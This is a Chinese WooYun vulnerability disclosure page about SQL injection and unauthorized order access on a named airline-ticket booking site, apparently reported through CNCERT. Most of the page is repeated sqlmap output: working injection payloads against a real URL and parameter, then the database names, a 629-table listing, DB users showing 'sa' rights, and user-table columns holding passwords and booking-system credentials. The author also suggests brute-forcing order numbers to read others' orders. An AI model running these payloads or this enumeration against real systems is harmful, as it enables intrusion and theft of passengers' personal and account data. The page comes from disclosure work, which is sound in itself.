当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0123632

漏洞标题:铁航一处SQL注入加未授权泄露超过27万机票订单

相关厂商:cncert国家互联网应急中心

漏洞作者: JiuShao

提交时间:2015-06-30 16:10

修复时间:2015-08-17 15:08

公开时间:2015-08-17 15:08

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-06-30: 细节已通知厂商并且等待厂商处理中
2015-07-03: 厂商已经确认,细节仅向厂商公开
2015-07-13: 细节向核心白帽子及相关领域专家公开
2015-07-23: 细节向普通白帽子公开
2015-08-02: 细节向实习白帽子公开
2015-08-17: 细节向公众公开

简要描述:

机票太火 我也想来凑热闹

详细说明:

注入点:http://b2b.89898989.com/reports/printreceipt.aspx?orderno=406032011601
sa权限 写shell失败 可执行sql命令 写shell也失败
未授权:http://b2b.89898989.com/reports/printreceipt.aspx?orderno=406032011601
orderno参数可控 生成个数字字典 跑一下就OK

漏洞证明:

sqlmap identified the following injection points with a total of 44 HTTP(s) requests:
---
Place: GET
Parameter: orderno
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: orderno=406032011601' AND 2984=2984 AND 'whMu'='whMu
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: orderno=406032011601' AND 1880=CONVERT(INT,(CHAR(58) CHAR(99) CHAR(113) CHAR(102) CHAR(58) (SELECT (CASE WHEN (1880=1880) THEN CHAR(49) ELSE CHAR(48) END)) CHAR(58) CHAR(103) CHAR(114) CHAR(120) CHAR(58))) AND 'UfkW'='UfkW
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase AND time-based blind (heavy query)
Payload: orderno=406032011601' AND 7100=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND 'sNNo'='sNNo
---
web server operating system: Windows 2008
web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008
available databases [10]:
[*] distribution
[*] master
[*] model
[*] msdb
[*] tempdb
[*] YeeSoHo_4.0
[*] YeeSoHo_History
[*] YeeSoHo_History2014
[*] YeeSoHo_Log
[*] YeeSoHo_Log_2015
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: orderno
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: orderno=406032011601' AND 2984=2984 AND 'whMu'='whMu
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: orderno=406032011601' AND 1880=CONVERT(INT,(CHAR(58) CHAR(99) CHAR(113) CHAR(102) CHAR(58) (SELECT (CASE WHEN (1880=1880) THEN CHAR(49) ELSE CHAR(48) END)) CHAR(58) CHAR(103) CHAR(114) CHAR(120) CHAR(58))) AND 'UfkW'='UfkW
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase AND time-based blind (heavy query)
Payload: orderno=406032011601' AND 7100=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND 'sNNo'='sNNo
---
web server operating system: Windows 2008
web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008
current database: 'YeeSoHo_4.0'
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: orderno
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: orderno=406032011601' AND 2984=2984 AND 'whMu'='whMu
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: orderno=406032011601' AND 1880=CONVERT(INT,(CHAR(58) CHAR(99) CHAR(113) CHAR(102) CHAR(58) (SELECT (CASE WHEN (1880=1880) THEN CHAR(49) ELSE CHAR(48) END)) CHAR(58) CHAR(103) CHAR(114) CHAR(120) CHAR(58))) AND 'UfkW'='UfkW
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase AND time-based blind (heavy query)
Payload: orderno=406032011601' AND 7100=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND 'sNNo'='sNNo
---
web server operating system: Windows 2008
web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008
Database: YeeSoHo_4.0
[629 tables]
+------------------------------------------+
| AccountDetailsView |
| AccountLogView |
| Change_SubsOrderNo_BK |
| CustomerOperatorLogView |
| D99_CMD |
| D99_REG |
| D99_Tmp |
| MSpeer_conflictdetectionconfigrequest |
| MSpeer_conflictdetectionconfigresponse |
| MSpeer_lsns |
| MSpeer_originatorid_history |
| MSpeer_request |
| MSpeer_response |
| MSpeer_topologyrequest |
| MSpeer_topologyresponse |
| MSpub_identity_range |
| Sheet1$ |
| T_AT_AgentInfo_B2B |
| T_AT_Logs |
| T_AT_OrderFlights |
| T_AT_OrderPassengers |
| T_AT_PlatFormConfig |
| T_AT_Syspara |
| T_AT_Tickets |
| T_AT_WatingList |
| T_AT_WatingList_bak |
| T_Agent_Users |
| T_Approve_Detail |
| T_Approve_Flow |
| T_Approve_Rule |
| T_Approve_RuleDetail |
| T_Arrive |
| T_Arrive_City |
| T_Arrive_province |
| T_BSP_Contrast |
| T_CODE_AIRCRAFTS |
| T_CODE_AIRPORTS |
| T_CODE_AirportTerminal |
| T_CODE_CARRIERS |
| T_CODE_CITY |
| T_CODE_COUNTRY |
| T_CODE_FDINFO |
| T_CUSTOMER_Address |
| T_CUSTOMER_Card |
| T_CUSTOMER_IdentityCard |
| T_CUSTOMER_PSR |
| T_CUSTOMER_PSR_BF |
| T_CUSTOMER_SERVICE |
| T_CUSTOMER_TELCODE |
| T_CUSTOMER_TELCODE_BAK |
| T_CUSTOMER_VISIT |
| T_CW_AccountLogs |
| T_CW_Accounts |
| T_CW_AcountDetails |
| T_CW_ApplyFillMoney |
| T_CW_ApplyFillMoney_PZ |
| T_CW_ApplyFillMoney_bak |
| T_CW_ApplyFillMoney_old |
| T_CW_CompanyInfo |
| T_CW_ContactCompany |
| T_CW_FreezeMoney |
| T_CW_MaterialType |
| T_CW_OrderUpload |
| T_CW_OrderUploadSearch |
| T_CW_Settlement |
| T_CW_UploadSubjects |
| T_CacheTable_HotCityPrice |
| T_CacheTable_PAT |
| T_Code_CarrierCustomer |
| T_Code_Customers |
| T_Code_FuelTax |
| T_Code_OverstepPriceReason |
| T_Code_PayRcvAccounts |
| T_Code_PayType |
| T_Code_Psg |
| T_Code_SettlementType |
| T_Common_Logs |
| T_Complaint_Analyse |
| T_Complaint_Base |
| T_Complaint_Check |
| T_Complaint_Modi |
| T_Complaint_Reply |
| T_Complaint_Satisfaction |
| T_Complaint_Settle |
| T_Complaint_Type |
| T_CustomerWebSites |
| T_Customer_Default |
| T_Customer_DefaultValues |
| T_Customer_Info |
| T_Customer_Phone_OpenScreen |
| T_Customer_Record_U |
| T_DR_funds |
| T_DR_start |
| T_Distributor_Department |
| T_Distributor_Info |
| T_Distributor_User |
| T_Distributor_User_20150303 |
| T_Distributor_User_bak |
| T_DownAvTasks |
| T_FAQ_Content |
| T_FAQ_KeyContent |
| T_FAQ_Keys |
| T_FAQ_Type |
| T_Finance_CollectReconciliat |
| T_Finance_ReconciliatAndOrder |
| T_Flow_Audit |
| T_Flow_AuditDetail |
| T_Flow_CustomerAuditDetail |
| T_Flow_Orders |
| T_Framework_Menu |
| T_Hotel |
| T_Hotel_Order |
| T_Hotel_OrderComments |
| T_Hotel_OrderContac |
| T_Hotel_OrderCreditCard |
| T_Hotel_OrderInDetail |
| T_Hotel_OrderInPerson |
| T_Hotel_OrderOperater |
| T_Hotel_Platform |
| T_Hotel_Room |
| T_Info |
| T_Info_R_Group |
| T_Info_Read |
| T_Info_Type |
| T_Info_TypeName |
| T_KH_AccountPeriod |
| T_KH_CustomerBalanceInfo |
| T_KH_CustomerIntegral |
| T_KH_CustomerLogs |
| T_KH_CustomerProvider |
| T_KH_Customers |
| T_KH_Echo_Customers_ContactPhones_Import |
| T_KH_Echo_Customers_Import |
| T_KH_Echo_Customers_Passengers |
| T_KH_FrequentFlyerAccount |
| T_KH_IntegralAccount |
| T_KH_IntegralWaitingList |
| T_KH_OrganizeCode |
| T_KH_OrganizeCodeRule |
| T_KH_Payment_Fee |
| T_KH_PendingIntegral |
| T_KH_RevAccounts |
| T_Log_AllUserLogs |
| T_Log_CallOn |
| T_Log_Report |
| T_Log_Saas |
| T_Logs_FlightSearch |
| T_Logs_FlightSearchCost |
| T_Logs_HX |
| T_Logs_JT |
| T_Logs_KoPu |
| T_Logs_PayPwd |
| T_Logs_UserLogin |
| T_Logs_Yeego |
| T_Member_Users |
| T_ModelPopupList |
| T_Msg_Content |
| T_Msg_Content_News |
| T_Msg_NotifyList |
| T_Msg_Subscribe |
| T_Msg_Type |
| T_Msg_UserHistory |
| T_Msg_UserHistory_News |
| T_News |
| T_News_Content |
| T_News_Module |
| T_Order_Banks |
| T_Order_PaymentGateway |
| T_Order_PaymentLog |
| T_Order_Payments |
| T_Order_ReturnOrder |
| T_Order_WaitingTasks |
| T_PNR_Info |
| T_PNR_Logs |
| T_POINTS_Consume |
| T_POINTS_GOODS_RULES |
| T_POINTS_GOODS_Storage |
| T_POINTS_RULES |
| T_POINTS_SERVICE |
| T_P_RolePermission |
| T_PaymentGP_Log |
| T_Plan_AvCache |
| T_Platform_GetPolicy_Result |
| T_Points_Log |
| T_PolicyUnion_FlightRoute |
| T_Price_AirProduct_Details |
| T_Price_AirProducts |
| T_Price_Base |
| T_Price_BaseClass |
| T_Price_CPPolicy |
| T_Price_Endorsement |
| T_Price_Gourp_DisplaySetting |
| T_Price_Group |
| T_Price_KWPolicy |
| T_Price_Logs |
| T_Price_Out |
| T_Price_Out_2015_06_08 |
| T_Price_Out_AirLineDetail |
| T_Price_Out_Detail |
| T_Price_Out_Detail_20141013 |
| T_Price_Out_Detail_2015_06_08 |
| T_Price_Out_Special |
| T_Price_Out_Special_20141013 |
| T_Price_Out_back |
| T_Price_Out_backDif_CR |
| T_Price_Out_bak_20141013 |
| T_Price_Policy |
| T_Price_PolicyBase |
| T_Price_PolicyBaseGroup |
| T_Price_Protocol |
| T_Price_R_Dep_Group |
| T_Price_R_Dep_Group_Log |
| T_Price_R_KWPolicy_Group |
| T_Price_R_Protocol_Group |
| T_Price_SpecialClass |
| T_Price_SubDealerDeuctPoint |
| T_Price_SubDealerRegion |
| T_Product_PackageDetail |
| T_Product_Packages |
| T_PublicInfos |
| T_Q_Handle_Log |
| T_Q_NotifyList |
| T_Q_Receive |
| T_Q_Receive_Details |
| T_Q_Receive_Details_Content |
| T_R_Department_User |
| T_R_Role_Fuction |
| T_R_Role_User |
| T_Report |
| T_ReportList |
| T_ReportModel |
| T_ReportModelDropDownList |
| T_ReportModelList |
| T_Report_Role_Function |
| T_Report_User_ReportFunction |
| T_Report_User_Role |
| T_Rpt_AccountDaily |
| T_Rpt_ConsumerAnalyse |
| T_Rpt_DomTktSalesCollect |
| T_Rpt_EmployeePerformance |
| T_Rpt_GathingStat |
| T_Rpt_ProfitCollect |
| T_Rpt_ReportTask |
| T_Rpt_SearchGathing |
| T_SMS_ApplyRechange |
| T_SMS_BirthdayRecords |
| T_SMS_ESBLOG |
| T_SMS_KeywordType |
| T_SMS_Keywords |
| T_SMS_RelationOfAgentAndSMSTemplate |
| T_SMS_RelationOfSMSTypeAndAgent |
| T_SMS_RelationOfSMSTypeAndCustomers |
| T_SMS_RelationOfSMSTypeAndKeywordType |
| T_SMS_SMSSendRecords |
| T_SMS_SMSTemplate |
| T_SMS_Type |
| T_SYS_BaseTypes |
| T_SYS_CARRIERS |
| T_SYS_CITY |
| T_SYS_InsuranceConfig |
| T_SYS_PNRPhoneFormat |
| T_SYS_Paras |
| T_SYS_PlatFormConfig |
| T_SYS_Promotion |
| T_SendMessage |
| T_Sum_Day |
| T_Sum_Detail |
| T_Sys_BaseType |
| T_Sys_BaseTypeNames |
| T_Sys_CusRegisterOpt |
| T_Sys_Error |
| T_Sys_Gds_Context |
| T_Sys_Holiday |
| T_Sys_Log |
| T_Sys_Notice |
| T_Sys_Online |
| T_Sys_PID |
| T_Sys_Para |
| T_Sys_ParamType |
| T_Sys_Payment |
| T_Sys_PaymentFee |
| T_Sys_PlatCodeMapping |
| T_Sys_PlatFormConfig_B2B |
| T_Sys_PrintAddr |
| T_Sys_ServerConfig |
| T_Sys_Server_Log |
| T_Sys_Services_Log |
| T_Sys_Switch |
| T_Team_Account |
| T_Team_Customer |
| T_Team_Log |
| T_Team_Passenger |
| T_Team_Plan |
| T_Team_Rule |
| T_Team_TravelRoute |
| T_Team_WarningMonitor |
| T_Team_WarningSetUp |
| T_Test |
| T_Tkt_Ask |
| T_Tkt_Detr_Lists |
| T_Tkt_Detr_Payments |
| T_Tkt_InStore |
| T_Tkt_Invalid |
| T_Tkt_Log |
| T_Tkt_OutStore |
| T_Tkt_Refund |
| T_Tkt_Stockpile |
| T_Tkt_Stockpile_BK |
| T_Tkt_Store |
| T_Tkt_Types |
| T_Tour |
| T_Upgrade_Function |
| T_User |
| T_User_20150303 |
| T_User_Department |
| T_User_Error |
| T_User_Fuction |
| T_User_Jobs |
| T_User_Msg |
| T_User_Role |
| T_User_Role_Fuction |
| T_User_Role_User |
| T_WorkOrder |
| T_YG_ReceiveOrders |
| T_YSTA_CusLevel_PriceGroup |
| T_YSTA_IPAllow |
| T_YSTA_Logs |
| T_YSTA_Logs_bk20130109 |
| T_YW_AccountPeriodBills |
| T_YW_AirOrders |
| T_YW_AirTickets |
| T_YW_AirTiketsSearch |
| T_YW_AirTiketsSearch_FOR_Excel |
| T_YW_ApplyMoney |
| T_YW_Bills |
| T_YW_ChangeTKTLog |
| T_YW_InterFlights |
| T_YW_OrderChangeDetails |
| T_YW_OrderDispatch |
| T_YW_OrderEffect |
| T_YW_OrderEndorsement |
| T_YW_OrderFlights |
| T_YW_OrderInsurance |
| T_YW_OrderInsurance_Logs |
| T_YW_OrderLogs |
| T_YW_OrderLogsEx |
| T_YW_OrderLogs_Client |
| T_YW_OrderPlatform |
| T_YW_OrderPlatform_Refund |
| T_YW_OrderPnrs |
| T_YW_OrderStatus |
| T_YW_OrderTickets |
| T_YW_OrderTickets_BAK |
| T_YW_Orders |
| T_YW_Ordertickets_CurSupplierMoney |
| T_YeeFare_Logs |
| T_Yeefare_PatTriggerNFDLog |
| T_customer_psr_bak |
| V4_Approve_Rule |
| V4_CW_AcountDetails |
| V4_CW_ContactCompanySearch |
| V4_CW_RPT_PartSellSummary |
| V4_CW_RPT_PaymentsList |
| V4_CW_RPT_PaymentsList_New |
| V4_CW_RPT_PaymentsList_New_Ex |
| V4_CW_RPT_PaymentsList_Normal |
| V4_CW_RPT_SalesDay |
| V4_CW_RPT_SalesSummary |
| V4_CW_Receivables |
| V4_CW_ZQReceivables |
| V4_Code_OverstepPriceReason |
| V4_Distributor_User |
| V4_KH_Payment_Fee |
| V4_KH_Price_Group |
| V4_Price_Group |
| V4_Product_PackageDetail |
| V4_RPT_Bills |
| V4_RPT_CusMangerPerformanceDetial |
| V4_RPT_CusMangerPerformanceSummary |
| V4_RPT_DisOrderSearch |
| V4_RPT_FltStat |
| V4_RPT_FltStatEx |
| V4_RPT_OrderSearch |
| V4_RPT_PassengerTrace |
| V4_RPT_SaleDay |
| V4_RPT_SalesReport |
| V4_RPT_SalesReport1 |
| V4_RPT_TicketMan_Carrier |
| V4_RPT_TicketMan_PrintAddr |
| V4_RPT_UnCompletedOrders |
| V4_Rpt_AccountDaily |
| V4_Rpt_AirTicketSearch |
| V4_Rpt_Distributor_Psr |
| V4_Rpt_LinkerLoginID |
| V4_SYS_InsueanceConfig |
| V4_SubDealAgentGainFlow |
| V4_SubDealAgentGainFlow_Tkt |
| V4_SubDealers |
| V4_YSTA_QueryOrderList |
| V4_YW_AccountPeriod |
| V4_YW_AirTiketsSearch |
| V4_YW_AirTiketsSearch_FOR_Excel |
| V4_YW_AssignTkt |
| V4_YW_CarrierAirTkcketSearch |
| V4_YW_CashRegisterList |
| V4_YW_ChannelOrder |
| V4_YW_ChannelOrder1 |
| V4_YW_ClerkCollect |
| V4_YW_CustomerManageOrders |
| V4_YW_EndDateRPT |
| V4_YW_GathingStat |
| V4_YW_GathingStat_New |
| V4_YW_NewOrderSearch |
| V4_YW_OrderPlatform |
| V4_YW_OrderTotalFee |
| V4_YW_OrderTotalFee_BX |
| V4_YW_OrdersQuery |
| V4_YW_OrdersQueryByNoEx |
| V4_YW_OrdersQueryByPsrNameEx |
| V4_YW_OrdersSearch |
| V4_YW_OrdersSearch_Normal |
| V4_YW_OrdersSearch_Simple |
| V4_YW_OtherOrderList |
| V4_Ysta_DailyReport |
| V4_Ysta_DistributorUser |
| V4_Ysta_SubsOrderNo |
| V_CW_Accounts |
| V_CW_ApplyFillMoney |
| V_CW_CollectionDetails |
| V_CW_CollectionTickets |
| V_CW_FillMoneyDetails |
| V_CW_FreezeMoney |
| V_CW_FreezeMoneyList |
| V_CW_OrderUpload |
| V_CW_OrderUploadSearch |
| V_CW_OweList |
| V_CW_PayList |
| V_CW_PrePayList |
| V_Distributor_AllConpleteOrder |
| V_Distributor_RefundOrderSearch |
| V_Distributor_SubsorderSearch |
| V_Dpt_Distributor |
| V_FAQ_Content |
| V_HotelOrderConfirm |
| V_Info_Dep_Info |
| V_KH_CUSTOMER_PSRTELECODE |
| V_KH_CallTelList |
| V_KH_Cus_Air_Order_Payments |
| V_KH_CustomerBalanceInfo |
| V_KH_CustomerBaseType |
| V_KH_CustomerPointType |
| V_KH_CustomerProvider |
| V_KH_CustomerProvider_ForProvider |
| V_KH_Customer_Audit |
| V_KH_Customers_Accounts |
| V_KH_Customers_AccountsEx |
| V_KH_Customers_AccountsEx1 |
| V_KH_Customers_OwnDep |
| V_KH_Customers_Phone |
| V_KH_Customers_Psr |
| V_KH_Customers_Psr_TelCode |
| V_KH_IntegralAccount |
| V_KH_PointsDetailsSearch |
| V_KH_Psg_CarrierCustomerNo |
| V_Msg_Content |
| V_Msg_Content_News |
| V_Msg_News |
| V_Msg_Subscribe |
| V_Msg_UserHistory |
| V_Msg_UserHistory_And_YW_OrderLogs |
| V_OrderDetail_Log |
| V_Order_Payment |
| V_Order_PaymentsLog |
| V_POINTS_GOODS_RULES_Storage |
| V_Price_Base |
| V_Price_BaseClass |
| V_Price_BaseEx |
| V_Price_Base_Execl |
| V_Price_Client |
| V_Price_ClientFORExport |
| V_Price_Dep_Group |
| V_Price_Endorsement |
| V_Price_Group |
| V_Price_Group_Protocol |
| V_Price_Out |
| V_Price_Out_Client |
| V_Price_Out_Detail |
| V_Price_Out_Group |
| V_Price_Out_Search |
| V_Price_Protocol |
| V_Price_SpecialClass |
| V_Q_Msg_Detail |
| V_RPT_AffixFeeSta |
| V_RPT_AirOrders |
| V_RPT_AirTickets |
| V_RPT_FBCus |
| V_RPT_FirstFlight |
| V_RPT_FltStat |
| V_RPT_ObsolescentDetail |
| V_RPT_OrderPNRs |
| V_RPT_RefundAirOrders |
| V_RPT_RefundDetail |
| V_RPT_RefundDetail_Ex |
| V_RPT_RefundDetail_TktNo |
| V_RPT_RevokeAirOrders |
| V_RPT_RevokeTickets |
| V_RPT_SaleRpt_Order |
| V_RPT_XLREPORT |
| V_RPT_XLREPORTEx |
| V_RPT_XLREPORTNoCase |
| V_RPT_XLREPORTSimple |
| V_RTP_SerialNoStatus |
| V_RoleUser |
| V_Rpt_AccountStat |
| V_Rpt_Static_DaySale |
| V_Rpt_Static_MonthSale |
| V_SYS_PrintAddr |
| V_Sys_Gds_Context |
| V_TJ_OrderTypeStatistic |
| V_TJ_TicketSellStatForCarrier |
| V_TJ_TicketSellStatistic |
| V_T_YW_PaymentDetailsExecl |
| V_Tkt_Ask |
| V_Tkt_Ask_Outstore |
| V_Tkt_Log |
| V_Tkt_Store |
| V_Tkt_Sum_Store |
| V_USER_Department_CusName |
| V_User |
| V_User_Agent |
| V_User_All_Union |
| V_User_Department |
| V_User_Distributor |
| V_User_Login |
| V_User_Role_Func |
| V_VIP_TelList |
| V_WorkOrder |
| V_YH_QueryGetDepFromGID |
| V_YH_QueryGetDepFromGID_New |
| V_YSTA_Logs |
| V_YW_AccountPeriodBills |
| V_YW_AirOrders |
| V_YW_AirOrdersAccountSummary |
| V_YW_Arrearage |
| V_YW_ArrearageEx |
| V_YW_ArrearageSum |
| V_YW_AssignTkt |
| V_YW_AssignTkt2 |
| V_YW_BillOrders |
| V_YW_Bills |
| V_YW_BillsCheckage |
| V_YW_Bills_Ex |
| V_YW_DetailAccount |
| V_YW_GathingDetails |
| V_YW_GathingStat |
| V_YW_NotDepartureOrderNos |
| V_YW_NotDepartureOrders |
| V_YW_OrdFirstFlight |
| V_YW_OrdFirstPsr |
| V_YW_OrderAirTickes |
| V_YW_OrderPnrs_FirstPnr |
| V_YW_OrderQuery_Gathing |
| V_YW_OrderTickets |
| V_YW_OrderTickets_IsExist |
| V_YW_OrderTickets_IsExist_Group |
| V_YW_Order_Bills |
| V_YW_OrdersBalance |
| V_YW_OrdersBalanceEx |
| V_YW_OrdersBalance_Rpt |
| V_YW_OrdersQuery |
| V_YW_OrdersQueryByNo |
| V_YW_OrdersQueryByNoEx |
| V_YW_OrdersQueryByPNR |
| V_YW_OrdersQueryByPsrName |
| V_YW_OrdersQueryByPsrNameEx |
| V_YW_OrdersQueryByTktNo |
| V_YW_OrdersQuery_CusName |
| V_YW_OrdersQuery_D |
| V_YW_OrdersQuery_D_Ex1 |
| V_YW_OrdersQuery_D_Test |
| V_YW_OrdersQuery_Ex |
| V_YW_OrdersQuery_Pnrs |
| V_YW_Passengers |
| V_YW_PaymentBills |
| V_YW_PaymentTypeMoney |
| V_YW_Payments |
| V_YW_PaymentsEx |
| V_YW_PaymentsSearch |
| V_YW_RefundAirOrders |
| V_YW_RefundAirOrders2 |
| V_YW_RefundAirOrdersAccountSummary |
| V_YW_RefundBalance |
| V_YW_RegulateAccountSummary |
| V_YW_RegulateOrders |
| V_YW_RevokeAirOrders |
| V_YW_RevokeBalance |
| V_YW_SubsOrders |
| V_YW_SubsOrdersAndOrders |
| V_YW_SubsOrdersAndPnrs |
| V_YW_SubsOrders_CusName |
| V_YW_SubsOrders_FirstPnr |
| V_YW_TiktonHoldOrDischarge |
| V_YW_TktPrint_SoldEvidence |
| V_YW_TktPrint_SoldEvidence_LastVersion |
| V_YW_TktPrint_Tickets |
| banlg |
| dtproperties |
| syncobj_0x3031323831333239 |
| syncobj_0x3042323033383533 |
| syncobj_0x3637364532303638 |
| syncobj_0x3639363843373746 |
| syncobj_0x3734453641353641 |
| syncobj_0x3838314533394145 |
| syncobj_0x4642353139433838 |
| sysarticlecolumns |
| sysarticles |
| sysarticleupdates |
| sysdiagrams |
| sysextendedarticlesview |
| syspublications |
| sysreplservers |
| sysschemaarticles |
| syssubscriptions |
| systranschemas |
| t_createperson |
| t_tkt_store_Backup |
| v4_Price_Preview |
| v4_SAgentGain_Info |
| v_rpt_saleday |
+------------------------------------------+
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: orderno
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: orderno=406032011601' AND 2984=2984 AND 'whMu'='whMu
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: orderno=406032011601' AND 1880=CONVERT(INT,(CHAR(58) CHAR(99) CHAR(113) CHAR(102) CHAR(58) (SELECT (CASE WHEN (1880=1880) THEN CHAR(49) ELSE CHAR(48) END)) CHAR(58) CHAR(103) CHAR(114) CHAR(120) CHAR(58))) AND 'UfkW'='UfkW
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase AND time-based blind (heavy query)
Payload: orderno=406032011601' AND 7100=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND 'sNNo'='sNNo
---
web server operating system: Windows 2008
web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008
database management system users [6]:
[*] ##MS_PolicyEventProcessingLogin##
[*] ##MS_PolicyTsqlExecutionLogin##
[*] ReplicationYeesoho
[*] sa
[*] yeesoho
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: orderno
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: orderno=406032011601' AND 2984=2984 AND 'whMu'='whMu
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: orderno=406032011601' AND 1880=CONVERT(INT,(CHAR(58) CHAR(99) CHAR(113) CHAR(102) CHAR(58) (SELECT (CASE WHEN (1880=1880) THEN CHAR(49) ELSE CHAR(48) END)) CHAR(58) CHAR(103) CHAR(114) CHAR(120) CHAR(58))) AND 'UfkW'='UfkW
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase AND time-based blind (heavy query)
Payload: orderno=406032011601' AND 7100=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND 'sNNo'='sNNo
---
web server operating system: Windows 2008
web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008
current user: 'sa'
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: orderno
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: orderno=406032011601' AND 2984=2984 AND 'whMu'='whMu
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: orderno=406032011601' AND 1880=CONVERT(INT,(CHAR(58) CHAR(99) CHAR(113) CHAR(102) CHAR(58) (SELECT (CASE WHEN (1880=1880) THEN CHAR(49) ELSE CHAR(48) END)) CHAR(58) CHAR(103) CHAR(114) CHAR(120) CHAR(58))) AND 'UfkW'='UfkW
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase AND time-based blind (heavy query)
Payload: orderno=406032011601' AND 7100=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND 'sNNo'='sNNo
---
web server operating system: Windows 2008
web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008
Database: YeeSoHo_4.0
Table: V_User
[11 columns]
+------------+----------+
| Column | Type |
+------------+----------+
| Level | int |
| CallSeatNo | varchar |
| CustomerNo |
| IsLogout | char |
| LogName | varchar |
| NoValidDt | datetime |
| Pwd | varchar |
| Remark |
| UpDepID | int |
| UserName | varchar |
| UserType | varchar |
+------------+----------+
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: orderno
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: orderno=406032011601' AND 2984=2984 AND 'whMu'='whMu
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: orderno=406032011601' AND 1880=CONVERT(INT,(CHAR(58) CHAR(99) CHAR(113) CHAR(102) CHAR(58) (SELECT (CASE WHEN (1880=1880) THEN CHAR(49) ELSE CHAR(48) END)) CHAR(58) CHAR(103) CHAR(114) CHAR(120) CHAR(58))) AND 'UfkW'='UfkW
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase AND time-based blind (heavy query)
Payload: orderno=406032011601' AND 7100=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND 'sNNo'='sNNo
---
web server operating system: Windows 2008
web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008
Database: YeeSoHo_4.0
Table: V_User
[22 columns]
+---------------+----------+
| Column | Type |
+---------------+----------+
| Level | int |
| CallSeatNo | varchar |
| CustomerNo | varchar |
| DepCustomerNo | varchar |
| DepID | int |
| DepName | varchar |
| Email | varchar |
| EtermPort | char |
| EtermPwd | varchar |
| EtermServer | varchar |
| EtermUser | varchar |
| HasValid | char |
| ID | int |
| IsLogout | char |
| LogName | varchar |
| NoValidDt | datetime |
| Pwd | varchar |
| Remark | varchar |
| Tel | varchar |
| UpDepID | int |
| UserName | varchar |
| UserType | varchar |
+---------------+----------+
Database: YeeSoHo_4.0
+------------+---------+
| Table | Entries |
+------------+---------+
| dbo.V_User | 1318 |
+------------+---------+
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: orderno
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: orderno=406032011601' AND 2984=2984 AND 'whMu'='whMu
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
